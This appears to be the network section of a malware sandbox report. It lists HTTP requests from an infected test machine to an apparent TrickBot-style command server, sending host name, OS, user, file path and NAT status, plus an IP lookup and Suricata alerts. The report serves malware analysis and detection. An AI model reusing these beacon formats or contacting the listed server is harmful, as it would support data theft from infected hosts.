Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| wtfismyip.com | 51.79.249.161 |
GET
200
https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/
REQUEST
RESPONSE
BODY
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:16 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/
REQUEST
RESPONSE
BODY
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:17 GMT
Content-Type: text/plain
Content-Length: 735
Connection: keep-alive
GET
200
https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
REQUEST
RESPONSE
BODY
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:18 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:18 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/
REQUEST
RESPONSE
BODY
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:18 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 185.56.175.122
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Fri, 10 Sep 2021 08:19:19 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
http://wtfismyip.com/text
REQUEST
RESPONSE
BODY
GET /text HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: wtfismyip.com
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Fri, 10 Sep 2021 08:19:17 GMT
Content-Length: 16
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49168 -> 185.56.175.122:443 | 2028401 | ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex | Unknown Traffic |
| TCP 192.168.56.102:49169 -> 51.79.249.161:80 | 2019737 | ET POLICY IP Check wtfismyip.com | Potential Corporate Privacy Violation |
| TCP 185.56.175.122:443 -> 192.168.56.102:49168 | 2011540 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | Not Suspicious Traffic |
| TCP 192.168.56.102:49169 -> 51.79.249.161:80 | 2013028 | ET POLICY curl User-Agent Outbound | Attempted Information Leak |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49168 185.56.175.122:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02 |
Snort Alerts
No Snort Alerts